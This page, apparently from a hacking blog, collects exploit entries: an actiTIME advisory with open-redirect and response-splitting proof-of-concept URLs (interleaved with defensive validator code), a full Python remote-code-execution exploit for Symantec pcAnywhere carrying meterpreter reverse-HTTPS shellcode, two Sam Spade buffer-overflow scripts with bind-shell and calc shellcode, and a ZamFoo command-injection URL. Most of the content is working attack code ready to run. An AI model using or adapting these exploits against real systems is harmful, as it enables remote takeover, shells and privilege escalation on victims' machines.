Contributors to this blog: HireHackking


actiTIME 2015.2 Multiple Vulnerabilities


Vendor: Actimind, Inc.
Product web page: http://www.actitime.com
Affected version: 2015.2 (Small Team Edition)

Summary: actiTIME is a web timesheet software. It allows you to
enter time spent on different work assignments, register time offs
and sick leaves, and then create detailed reports covering almost
any management or accounting needs.

Desc: The application suffers from multiple security vulnerabilities
including: Open Redirection, HTTP Response Splitting and Unquoted
Service Path Elevation Of Privilege.

Tested on: OS/Platform:	Windows 7 6.1 for x86
           Servlet Container: Jetty/5.1.4
           Servlet API Version: 2.4
           Java: 1.7.0_76-b13
           Database: MySQL 5.1.72-community-log
           Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13
           Patch level: 28.0


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5273
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php


13.10.2015

--



1. Open Redirect
-----------------

http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1


2. HTTP Response Splitting
---------------------------

http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1

Response:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 14 Oct 2015 09:32:05 GMT
Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76
Content-Type: text/html;charset=UTF-8
Cache-Control: no-store, no-cache
Pragma: no-cache
Expires: Tue, 09 Sep 2014 09:32:05 GMT
X-UA-Compatible: IE=Edge
Location: http://localhost/administration/
Server: Waddup/2.0
Content-Length: 0
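Both findings above come from the same unvalidated `redirectUrl` parameter: an absolute URL sends the browser off-site (section 1), and a value containing CR/LF lands verbatim in the `Location` header and splits the response (section 2). The following validator is an added example, not actiTIME's code; the allowed prefix `/administration/` and the fallback target are assumptions, and the function expects the parameter already URL-decoded, as a servlet container would hand it over.

```python
from urllib.parse import parse_qs, urlsplit

# Assumed application-side settings (not actiTIME's real configuration):
# the only places a post-settings redirect may legitimately land.
ALLOWED_PATH_PREFIXES = ("/administration/",)
DEFAULT_REDIRECT = "/administration/"


def safe_redirect_target(value):
    """Validate an already URL-decoded redirectUrl parameter.

    Returns the value unchanged only if it is a same-site path under an allowed
    prefix; anything else falls back to DEFAULT_REDIRECT. Rejected inputs:
      - CR, LF or any other control character (would split the response
        into extra headers, as the 'Server: Waddup/2.0' PoC does),
      - an absolute URL with a scheme or host (off-site open redirect),
      - a protocol-relative URL such as //attacker.example (and its
        backslash variant, which browsers normalise to a slash),
      - a path outside the allowed prefixes.
    """
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return DEFAULT_REDIRECT
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return DEFAULT_REDIRECT
    if value.startswith(("//", "/\\", "\\\\")):
        return DEFAULT_REDIRECT
    if not value.startswith(ALLOWED_PATH_PREFIXES):
        return DEFAULT_REDIRECT
    return value


def location_for_request(request_url):
    """Extract redirectUrl from a full request URL (as the PoC URLs carry it),
    decode it the way a servlet container would, and return the Location
    header value the server should emit."""
    params = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    raw = params.get("redirectUrl", [""])[0]
    return safe_redirect_target(raw)
```

Run against the two PoC URLs above, both are replaced by the default landing page, while a same-site path under the allowed prefix passes through untouched.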


3. Unquoted Service Path Elevation Of Privilege
------------------------------------------------

C:\Users\joxy>sc qc actiTIME
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: actiTIME
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : actiTIME Server
        DEPENDENCIES       : actiTIME MySQL
        SERVICE_START_NAME : LocalSystem
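The `sc qc` output above shows the three properties that turn an unquoted path into a privilege-escalation issue: the image path is unquoted and contains spaces, the service auto-starts, and it runs as LocalSystem. The audit script below is an added example (not part of the advisory) that parses that output, flags the condition and builds the `sc config ... binPath=` remediation; the sample input is the advisory's own output embedded as a string.

```python
import re

# The `sc qc actiTIME` output quoted in the advisory above, embedded here as
# sample input (a real audit would feed it the live output of sc.exe).
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: actiTIME
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : actiTIME Server
        DEPENDENCIES       : actiTIME MySQL
        SERVICE_START_NAME : LocalSystem
"""

_FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value (values stripped)."""
    config = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            config[m.group(1)] = m.group(2).strip()
    return config


def split_binary_path(bin_path):
    """Split BINARY_PATH_NAME into (executable, arguments, was_quoted).

    A quoted image path is taken up to the closing quote; an unquoted one is
    taken up to the first '.exe' (case-insensitive), the rest being arguments.
    """
    bin_path = bin_path.strip()
    if bin_path.startswith('"'):
        end = bin_path.find('"', 1)
        if end == -1:
            return bin_path[1:], "", True
        return bin_path[1:end], bin_path[end + 1:].strip(), True
    m = re.match(r"(?i)^(.*?\.exe)(.*)$", bin_path)
    if m:
        return m.group(1), m.group(2).strip(), False
    return bin_path, "", False


def audit_service(text):
    """Flag the unquoted-service-path condition and build the sc.exe fix.

    The condition is exploitable only when the image path is unquoted AND
    contains a space; the report also records whether the service runs as
    LocalSystem and auto-starts, which is what makes it a privilege-escalation
    issue rather than a cosmetic one.
    """
    cfg = parse_sc_qc(text)
    exe, args, quoted = split_binary_path(cfg.get("BINARY_PATH_NAME", ""))
    vulnerable = (not quoted) and (" " in exe)
    report = {
        "service": cfg.get("SERVICE_NAME", ""),
        "executable": exe,
        "arguments": args,
        "quoted": quoted,
        "unquoted_path_with_spaces": vulnerable,
        "runs_as": cfg.get("SERVICE_START_NAME", ""),
        "auto_start": "AUTO_START" in cfg.get("START_TYPE", ""),
        "fix": None,
    }
    if vulnerable:
        # Remediation: re-register the image path with the executable quoted.
        # sc.exe needs the space after 'binPath=' and the inner quotes escaped.
        fixed = '\\"%s\\"' % exe + (" " + args if args else "")
        report["fix"] = 'sc config %s binPath= "%s"' % (report["service"], fixed)
    return report
```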
            
#!/usr/bin/python

################################################################
# Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE
# Date: 2015-10-31
# Exploit Author: Tomislav Paskalev
# Vendor Homepage: https://www.symantec.com/
# Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe
#   Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# Vulnerable Software:
#   Symantec pcAnywhere 12.5.x through 12.5.3
#   Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)
# Tested on:
#   Symantec pcAnywhere v12.5.0 Build 442 (Trial)
#   --------------------------------------------
#   Microsoft Windows Vista Ultimate SP1 x86 EN
#   Microsoft Windows Vista Ultimate SP2 x86 EN
#   Microsoft Windows 2008 Enterprise SP2 x86 EN
#   Microsoft Windows 7 Professional SP1 x86 EN
#   Microsoft Windows 7 Ultimate SP1 x86 EN
# CVE ID: 2011-3478
# OSVDB-ID: 78532
################################################################
# Vulnerability description:
#   The application's module used for handling incoming connections
#   (awhost32.exe) contains a flaw. When handling authentication
#   requests, the vulnerable process copies user provided input
#   to a fixed length buffer without performing a length check.
#   A remote unauthenticated attacker can exploit this vulnerability
#   to cause a buffer overflow and execute arbitrary code in the
#   context of the exploited application (installed as a service
#   by default, i.e. with "NT AUTHORITY\SYSTEM" privileges).
################################################################
# Target application notes:
#   - the application processes one login attempt at a time
#     (i.e. multiple parallel login requests are not possible)
#   - available modules (interesting exploit wise):
#     Name         | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll
#    -------------------------------------------------------------
#     awhost32.exe | False  | False   | False |  False   | False
#     ijl20.dll    | False  | False   | False |  False   | False
#     IMPLODE.DLL  | False  | False   | False |  False   | False
#    -------------------------------------------------------------
#   - supported Windows x86 operating systems (pcAnywhere v12.5)
#       - Windows 2000
#       - Windows 2003 Server
#       - Windows 2008 Server
#       - Windows XP
#       - Windows Vista
#       - Windows 7
################################################################
# Exploit notes:
#   - bad characters: "\x00"
#   - Windows Vista, Windows 2008 Server, Windows 7
#     - after a shellcode execution event occurs, the
#       application does not crash and remains fully functional
#       - one successful shellcode execution event has a low
#         success rate (applies to all OSes)
#         - in order to achieve an overall more reliable exploit,
#           multiple shellcode executions need to be performed
#           (until the shellcode is successfully executed)
#           - brute force is a feasible method 
#             - multiple parallel brute force attacks are not possible
#   - multiple valid offsets are available (i.e. not just the
#     ones tested)
################################################################
# Test notes:
#   - all tested OSes
#     - clean default installations
#   - all OS specific statistics referenced in the exploit are
#     based on the test results of 10 attempts per tested offset
#     - all attempts were performed after a system reboot (VM)
#     - the provided test results should be taken only as a rough guide
#       - in practice it might occur that the number of attempts
#         needed to achieve successful exploitation is (much)
#         higher than the maximum value contained in the test
#         results, or that the exploit does not succeed at all
#         - other (untested) offsets might provide better results
#   - not letting the OS and application load fully/properly before
#     starting the exploit may lead to failed exploitation (this
#     observation was made during the testing of the exploit and
#     applies mostly to Windows 7)
################################################################
# Patch:
#   https://support.symantec.com/en_US/article.TECH179526.html
#   https://support.norton.com/sp/en/us/home/current/solutions/v78694006_EndUserProfile_en_us
################################################################
# Thanks to:
#   Tal zeltzer (discovered the vulnerability)
#   S2 Crew (Python PoC)
################################################################
# In memoriam:
#   msfpayload | msfencode  [2005 - 2015]
################################################################
# References:
#   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3478
#   http://www.zerodayinitiative.com/advisories/ZDI-12-018/
#   https://www.exploit-db.com/exploits/19407/
################################################################


import socket
import time
import struct
import string
import sys




################################
###  HARDCODED TARGET INFO   ###
################################


# target server info
# >>> MODIFY THIS >>>
targetServer = "192.168.80.227"
targetPort   = 5631


# Supported operating systems
vistaUltSP1  = {
    'Version': 'Microsoft Windows Vista Ultimate SP1 x86 EN',
    'Offset': 0x03e60000,
    'PasswordStringLength': 3500,
    'TestAttempts': [8, 62, 35, 13, 8, 7, 11, 23, 8, 10]
};
vistaUltSP2  = {
    'Version': 'Microsoft Windows Vista Ultimate SP2 x86 EN',
    'Offset': 0x03e60000,
    'PasswordStringLength': 3500,
    'TestAttempts': [16, 27, 13, 17, 4, 13, 7, 9, 5, 16]
};
s2k8EntSP2   = {
    'Version': 'Microsoft Windows 2008 Enterprise SP2 x86 EN',
    'Offset': 0x03dd0000,
    'PasswordStringLength': 3500,
    'TestAttempts': [25, 5, 14, 18, 66, 7, 8, 4, 4, 24]
};
sevenProSP1  = {
    'Version': 'Microsoft Windows 7 Professional SP1 x86 EN',
    'Offset': 0x03a70000,
    'PasswordStringLength': 3500,
    'TestAttempts': [188, 65, 25, 191, 268, 61, 127, 136, 18, 98]
};
sevenUltSP1  = {
    'Version': 'Microsoft Windows 7 Ultimate SP1 x86 EN',
    'Offset': 0x03fa0000,
    'PasswordStringLength': 3500,
    'TestAttempts': [23, 49, 98, 28, 4, 31, 4, 42, 50, 42]
};


# target server OS
# >>> MODIFY THIS >>>
#OSdictionary = vistaUltSP1
#OSdictionary = vistaUltSP2
#OSdictionary = s2k8EntSP2
#OSdictionary = sevenProSP1
OSdictionary = sevenUltSP1


# timeout values
shellcodeExecutionTimeout = 30


# client-server handshake
initialisationSequence = "\x00\x00\x00\x00"
handshakeSequence      = "\x0d\x06\xfe"


# username string
usernameString         = "U" * 175


# shellcode
# available shellcode space: 1289 bytes
# shellcode generated with Metasploit Framework Version: 4.11.4-2015090201 (Kali 2.0)
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.80.223 LPORT=443 EXITFUNC=seh -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode
# >>> MODIFY THIS >>>
shellcode =  ""
shellcode += "\xda\xd3\xd9\x74\x24\xf4\xbf\x2c\x46\x39\x97\x5d"
shellcode += "\x33\xc9\xb1\x87\x83\xed\xfc\x31\x7d\x14\x03\x7d"
shellcode += "\x38\xa4\xcc\x6b\xa8\xaa\x2f\x94\x28\xcb\xa6\x71"
shellcode += "\x19\xcb\xdd\xf2\x09\xfb\x96\x57\xa5\x70\xfa\x43"
shellcode += "\x3e\xf4\xd3\x64\xf7\xb3\x05\x4a\x08\xef\x76\xcd"
shellcode += "\x8a\xf2\xaa\x2d\xb3\x3c\xbf\x2c\xf4\x21\x32\x7c"
shellcode += "\xad\x2e\xe1\x91\xda\x7b\x3a\x19\x90\x6a\x3a\xfe"
shellcode += "\x60\x8c\x6b\x51\xfb\xd7\xab\x53\x28\x6c\xe2\x4b"
shellcode += "\x2d\x49\xbc\xe0\x85\x25\x3f\x21\xd4\xc6\xec\x0c"
shellcode += "\xd9\x34\xec\x49\xdd\xa6\x9b\xa3\x1e\x5a\x9c\x77"
shellcode += "\x5d\x80\x29\x6c\xc5\x43\x89\x48\xf4\x80\x4c\x1a"
shellcode += "\xfa\x6d\x1a\x44\x1e\x73\xcf\xfe\x1a\xf8\xee\xd0"
shellcode += "\xab\xba\xd4\xf4\xf0\x19\x74\xac\x5c\xcf\x89\xae"
shellcode += "\x3f\xb0\x2f\xa4\xad\xa5\x5d\xe7\xb9\x57\x3b\x6c"
shellcode += "\x39\xc0\xb4\xe5\x57\x79\x6f\x9e\xeb\x0e\xa9\x59"
shellcode += "\x0c\x25\x84\xbe\xa1\x95\xb4\x13\x16\x72\x01\xc2"
shellcode += "\xe1\x25\x8a\x3f\x42\x79\x1f\xc3\x37\x2e\xb7\x78"
shellcode += "\xb6\xd0\x47\x97\x86\xd1\x47\x67\xd9\x84\x3f\x54"
shellcode += "\x6e\x11\x95\xaa\x3a\x37\x6f\xa8\xf7\xbe\xf8\x1d"
shellcode += "\x4c\x16\x73\x50\x25\xc2\x0c\xa6\x91\xc1\xb0\x8b"
shellcode += "\x53\x69\x76\x22\xd9\x46\x0a\x1a\xbc\xea\x87\xf9"
shellcode += "\x09\xb2\x10\xcf\x14\x3c\xd0\x56\xb3\xc8\xba\xe0"
shellcode += "\x69\x5a\x3a\xa2\xff\xf0\xf2\x73\x92\x4b\x79\x10"
shellcode += "\x02\x3f\x4f\xdc\x8f\xdb\xe7\x4f\x6d\x1d\xa9\x1d"
shellcode += "\x42\x0c\x70\x80\xcc\xe9\xe5\x0a\x55\x80\x8a\xc2"
shellcode += "\x3d\x2a\x2f\xa5\xe2\xf1\xfe\x7d\x2a\x86\x6b\x08"
shellcode += "\x27\x33\x2a\xbb\xbf\xf9\xd9\x7a\x7d\x87\x4f\x10"
shellcode += "\xed\x0d\x1b\xad\x88\xc6\xb8\x50\x07\x6a\x74\xf1"
shellcode += "\xd3\x2d\xd9\x84\x4e\xc0\x8e\x25\x23\x76\x60\xc9"
shellcode += "\xb4\xd9\xf5\x64\x0e\x8e\xa6\x22\x05\x39\x3f\x98"
shellcode += "\x96\x8e\xca\x4f\x79\x54\x64\x26\x33\x3d\xe7\xaa"
shellcode += "\xa2\xb1\x90\x59\x4b\x74\x1a\xce\xf9\x0a\xc6\xd8"
shellcode += "\xcc\x99\x49\x75\x47\x33\x0e\x1c\xd5\xf9\xde\xad"
shellcode += "\xa3\x8c\x1e\x02\x3b\x38\x96\x3d\x7d\x39\x7d\xc8"
shellcode += "\x47\x95\x16\xcb\x75\xfa\x63\x98\x2a\xa9\x3c\x4c"
shellcode += "\x9a\x25\x28\x27\x0c\x8d\x51\x1d\xc6\x9b\xa7\xc1"
shellcode += "\x8e\xdb\x8b\xfd\x4e\x55\x0b\x97\x4a\x35\xa6\x77"
shellcode += "\x04\xdd\x43\xce\x36\x9b\x53\x1b\x15\xf7\xf8\xf7"
shellcode += "\xcf\x9f\xd3\xf1\xf7\x24\xd3\x2b\x82\x1b\x5e\xdc"
shellcode += "\xc3\xee\x78\x34\x90\x10\x7b\xc5\x4c\x51\x13\xc5"
shellcode += "\x80\x51\xe3\xad\xa0\x51\xa3\x2d\xf3\x39\x7b\x8a"
shellcode += "\xa0\x5c\x84\x07\xd5\xcc\x28\x21\x3e\xa5\xa6\x31"
shellcode += "\xe0\x4a\x37\x61\xb6\x22\x25\x13\xbf\x51\xb6\xce"
shellcode += "\x3a\x55\x3d\x3e\xcf\x51\xbf\x03\x4a\x9d\xca\x66"
shellcode += "\x0c\xdd\x6a\x81\xdb\x1e\x6b\xae\x12\xd8\xa6\x7f"
shellcode += "\x65\x2c\xff\x51\xbd\x60\xd1\x9f\x8f\xb3\x2d\x5b"
shellcode += "\x11\xbd\x1f\x71\x87\xc2\x0c\x7a\x82\xa9\xb2\x47"




################################
###     BUFFER OVERFLOW      ###
###   STRING CONSTRUCTION    ###
################################


# Calculate address values based on the OS offset
pointerLocationAddress    = OSdictionary['Offset'] + 0x00005ad8
pointerForECXplus8Address = OSdictionary['Offset'] + 0x00005ad4
breakPointAddress         = OSdictionary['Offset'] + 0x000065af - 0x00010000


# jump over the next 38 bytes (to the begining of the shellcode)
jumpToShellcode    = "\xeb\x26\x90\x90"

# pointerLocationAddress - the memory address location of the "pointerForECXplus8" variable
pointerLocation    = struct.pack('<L', pointerLocationAddress)

# CALL ESI from the application module ijl20.dll [aslr=false,rebase=false,safeseh=false]
callESI            = struct.pack('<L', 0x67f7ab23)

# pointerForECXplus8Address - the memory address location of the start of the DDDD string in the shellcode (Offset + 0x00005acc + 0x8)
pointerForECXplus8 = struct.pack('<L', pointerForECXplus8Address)


# construct the password string which will cause a buffer overflow condition and exploit the vulnerability
passwordString = (
    "A" * 945 +
    jumpToShellcode +
    pointerLocation +
    "D" * 4 +
    pointerForECXplus8 +
    callESI +
    "\x90" * 20 +
    shellcode +
    "I" * (1289 - len(shellcode)) +
    "\xaa" * (OSdictionary['PasswordStringLength'] - 945 - 4 * 5 - 20 - 1289)
)




################################
###        FUNCTIONS         ###
################################


# calculate and return the median value of the argument list
def calculateMedian(targetList):
    sortedTargetList = sorted(targetList)
    targetListLength = len(targetList)
    medianIndex = (targetListLength - 1) / 2

    if (targetListLength % 2):
        return sortedTargetList[medianIndex]
    else:
        return ((sortedTargetList[medianIndex] + sortedTargetList[medianIndex + 1]) / 2)



# print an indented line with a type prefix
def printLine(infoType, indentDepth, textToDisplay):

    # [I]nformational
    if infoType == "I":
        print ('    ' * indentDepth),
        print "\033[1;37m[*]\033[1;m", textToDisplay

    # [E]rror
    elif infoType == "E":
        print ('    ' * indentDepth),
        print "\033[1;31m[-]\033[1;m", textToDisplay

    # [S]uccess
    elif infoType == "S":
        print ('    ' * indentDepth),
        print "\033[1;32m[+]\033[1;m", textToDisplay

    # [W]arning
    elif infoType == "W":
        print ('    ' * indentDepth),
        print "\033[1;33m[!]\033[1;m", textToDisplay

    # [N]one
    elif infoType == "N":
        print ('    ' * indentDepth),
        print textToDisplay



# print the banner - general exploit info, target info, target OS statistics
def printBanner():
    printLine ("I", 0, "Symantec pcAnywhere v12.5.0 Build 442 Login+Password field")
    printLine ("N", 1, "Buffer Overflow Remote Code Execution exploit (CVE-2011-3478)")
    printLine ("I", 1, "by Tomislav Paskalev")

    printLine ("I", 0, "Target server information")
    printLine ("I", 1, "IP address            : " + targetServer)
    printLine ("I", 1, "Port                  : " + str(targetPort))

    printLine ("I", 0, "Exploit target information")
    printLine ("I", 1, "Target OS             : " + OSdictionary['Version'])
    printLine ("I", 2, "Offset            : " + "{:#010x}".format(OSdictionary['Offset']))
    printLine ("I", 2, "Breakpoint (test) : " + "{:#010x}".format(breakPointAddress))
    printLine ("I", 2, "Password length   : " + str(OSdictionary['PasswordStringLength']))
    printLine ("I", 2, "Test result stats")
    printLine ("I", 3, "Test count    : " + str(len(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Reliability   : " + str(((len(OSdictionary['TestAttempts']) - OSdictionary['TestAttempts'].count(0)) * 100) / len(OSdictionary['TestAttempts'])) + "%")
    printLine ("I", 3, "Min attempt   : " + str(min([element for element in OSdictionary['TestAttempts'] if element > 0])))
    printLine ("I", 3, "Max attempt   : " + str(max(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Avg attempt   : " + str(sum(OSdictionary['TestAttempts']) / len(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Median attempt: " + str(calculateMedian(OSdictionary['TestAttempts'])))



# connect to the server and return the socket
def connectToServer(server, port):
    # create socket
    targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        targetSocket.connect((server, port))
    except socket.error as msg:
        if "[Errno 111] Connection refused" in str(msg):
            return None
    # return the opened socket
    return targetSocket



# send the data to the server and return the response
def sendDataToServer(destSocket, dataToSend):
    destSocket.send(dataToSend)
    try:
        receivedData = destSocket.recv(1024)
    except socket.error as msg:
        if "[Errno 104] Connection reset by peer" in str(msg):
            return None
    return receivedData



# run the exploit; exits when finished or interrupted
def runExploit():
    printLine ("I", 0, "Starting exploit...")

    attemptCounter = 0

    # brute force the service until the shellcode is successfully executed
    while True:
        # connect to the target server
        openSocket = connectToServer(targetServer, targetPort)

        attemptCounter += 1
        sleepTimer = 0

        printLine ("I", 1, "Attempt no. " + str(attemptCounter))
        printLine ("I", 2, "Sending initialisation sequence...")

        # send the data; check outcome
        while True:
            receivedData = sendDataToServer(openSocket, initialisationSequence)
            # check if server responded properly, if yes exit the loop
            if receivedData:
                if "Please press <Enter>..." in receivedData:
                    break
            # exit if the service is unavailable
            if attemptCounter == 1:
                printLine ("E", 3, "Service unavailable")
                printLine ("I", 4, "Exiting...")
                exit(1)
            # check if shellcode executed (based on a timer)
            if sleepTimer > shellcodeExecutionTimeout:
                print ""
                printLine ("S", 4, "Shellcode executed after " + str(attemptCounter - 1) + " attempts")
                printLine ("I", 5, "Exiting...")
                exit(1)

            # print waiting ticks
            sys.stdout.write('\r')
            sys.stdout.write("             \033[1;33m[!]\033[1;m Connection reset - reinitialising%s" % ('.' * sleepTimer))
            sys.stdout.flush()

            # sleep one second and reconnect
            time.sleep(1)
            sleepTimer += 1

            openSocket.close()
            openSocket = connectToServer(targetServer, targetPort)

        if sleepTimer > 0:
            print ""

        printLine ("I", 2, "Sending handshake sequence...")
        openSocket.send(handshakeSequence)
        time.sleep(3)
        data = openSocket.recv(1024)
 
        printLine ("I", 2, "Sending username...")
        openSocket.send(usernameString)
        time.sleep(3)
 
        printLine ("I", 2, "Sending password...")
        openSocket.send(passwordString)
        openSocket.close()
        time.sleep(3)



# main function
if __name__ == "__main__":
    printBanner()
    try:
        runExploit()
    except KeyboardInterrupt:
        print ""
        sys.exit()


# End of file
            
#!/usr/bin/python 
# -*- coding: cp1252 -*-
# EXPLOIT TITLE: Sam Spade 1.14 Scan from IP address Field Exploit
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Luis Martínez
# Date of Testing: 2nd November 2015
# Download Link : https://www.exploit-db.com/apps/7ad7569341d685b4760ba4adecab6def-spade114.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called buffer.txt
# Step 3: Copy the contents of buffer.txt file
# Step 4: Now open Sam Spade 1.14 
# Step 5: Go To 'Tools' > 'Scan Addresses...' 
# Step 6: Paste the contents in 'Scan from IP addresses' input field 
# Step 7: Connect to the target at port 4444 with ncat/nc 




file = open('buffer.txt' , 'wb');

buffer = "A"*507 + "\x9f\x43\x30\x5d"  #JMP ESP 
buffer += "\x90"*20

# msfvenom  -p windows/shell_bind_tcp -f c -b "\x00\x0a\x0d\x20\x0b\x0c"

buffer += ("\xba\x72\x30\xbb\xe7\xdd\xc1\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x53\x31\x50\x12\x83\xc0\x04\x03\x22\x3e\x59\x12\x3e\xd6\x1f"
"\xdd\xbe\x27\x40\x57\x5b\x16\x40\x03\x28\x09\x70\x47\x7c\xa6"
"\xfb\x05\x94\x3d\x89\x81\x9b\xf6\x24\xf4\x92\x07\x14\xc4\xb5"
"\x8b\x67\x19\x15\xb5\xa7\x6c\x54\xf2\xda\x9d\x04\xab\x91\x30"
"\xb8\xd8\xec\x88\x33\x92\xe1\x88\xa0\x63\x03\xb8\x77\xff\x5a"
"\x1a\x76\x2c\xd7\x13\x60\x31\xd2\xea\x1b\x81\xa8\xec\xcd\xdb"
"\x51\x42\x30\xd4\xa3\x9a\x75\xd3\x5b\xe9\x8f\x27\xe1\xea\x54"
"\x55\x3d\x7e\x4e\xfd\xb6\xd8\xaa\xff\x1b\xbe\x39\xf3\xd0\xb4"
"\x65\x10\xe6\x19\x1e\x2c\x63\x9c\xf0\xa4\x37\xbb\xd4\xed\xec"
"\xa2\x4d\x48\x42\xda\x8d\x33\x3b\x7e\xc6\xde\x28\xf3\x85\xb6"
"\x9d\x3e\x35\x47\x8a\x49\x46\x75\x15\xe2\xc0\x35\xde\x2c\x17"
"\x39\xf5\x89\x87\xc4\xf6\xe9\x8e\x02\xa2\xb9\xb8\xa3\xcb\x51"
"\x38\x4b\x1e\xcf\x30\xea\xf1\xf2\xbd\x4c\xa2\xb2\x6d\x25\xa8"
"\x3c\x52\x55\xd3\x96\xfb\xfe\x2e\x19\x12\xa3\xa7\xff\x7e\x4b"
"\xee\xa8\x16\xa9\xd5\x60\x81\xd2\x3f\xd9\x25\x9a\x29\xde\x4a"
"\x1b\x7c\x48\xdc\x90\x93\x4c\xfd\xa6\xb9\xe4\x6a\x30\x37\x65"
"\xd9\xa0\x48\xac\x89\x41\xda\x2b\x49\x0f\xc7\xe3\x1e\x58\x39"
"\xfa\xca\x74\x60\x54\xe8\x84\xf4\x9f\xa8\x52\xc5\x1e\x31\x16"
"\x71\x05\x21\xee\x7a\x01\x15\xbe\x2c\xdf\xc3\x78\x87\x91\xbd"
"\xd2\x74\x78\x29\xa2\xb6\xbb\x2f\xab\x92\x4d\xcf\x1a\x4b\x08"
"\xf0\x93\x1b\x9c\x89\xc9\xbb\x63\x40\x4a\xcb\x29\xc8\xfb\x44"
"\xf4\x99\xb9\x08\x07\x74\xfd\x34\x84\x7c\x7e\xc3\x94\xf5\x7b"
"\x8f\x12\xe6\xf1\x80\xf6\x08\xa5\xa1\xd2")



file.write(buffer);
file.close()
            
# Exploit Title     : Sam Spade 1.14 - Buffer OverFlow
# Date              : 10/30/2015
# Exploit Author    : MandawCoder
# Contact           : MandawCoder@gmail.com
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Version           : 1.14
# Tested on         : XP Professional SP3 En x86
# Category          : Local Exploit
# Description:
# The bug is in this section: Tools -> Crawl website...
# Execute the following exploit, then delete "http://" from the "CRAWL all URLs below" field, then paste the content of file.txt into the mentioned section.
#
# This section (and other sections as well) also has an SEH buffer overflow ... I would really appreciate it if someone exploited it.


f = open("file.txt", "w")

Junk = "A"*503

addr = "\x53\x93\x42\x7E"

space = "AAAA"

nop="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

# Shellcode:
# windows/exec - 277 bytes
# CMD=calc.exe
shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e"
"\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\x1a\x89\x23"
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xb1\x61\x81\x8d\x7d\x2d"
"\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\x1c\x03\x22\xd5"
"\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07"
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xe1\xd7\x9f\x18\xa8\x5c"
"\x6b\xea\x2b\xb5\xa5\x13\x1a\xf9\x6a\x2a\x93\xf4\x73\x6a\x13"
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46\xbb\x03\x0f\xa3"
"\x3a\xc7\xd6\x20\x30\xac\x9d\x6f\x54\x33\x71\x04\x60\xb8\x74"
"\xcb\xe1\xfa\x52\xcf\xaa\x59\xfa\x56\x16\x0f\x03\x88\xfe\xf0"
"\xa1\xc2\xec\xe5\xd0\x88\x7a\xfb\x51\xb7\xc3\xfb\x69\xb8\x63"
"\x94\x58\x33\xec\xe3\x64\x96\x49\x1b\x2f\xbb\xfb\xb4\xf6\x29"
"\xbe\xd8\x08\x84\xfc\xe4\x8a\x2d\x7c\x13\x92\x47\x79\x5f\x14"
"\xbb\xf3\xf0\xf1\xbb\xa0\xf1\xd3\xdf\x27\x62\xbf\x31\xc2\x02"
 "\x5a\x4e")

f.write(Junk + addr + space + nop + shellcode)

f.close()

print "Done"
            
source: https://www.securityfocus.com/bid/60826/info

ZamFoo is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

ZamFoo 12.0 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command` 
            
source: https://www.securityfocus.com/bid/60795/info

Xaraya is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

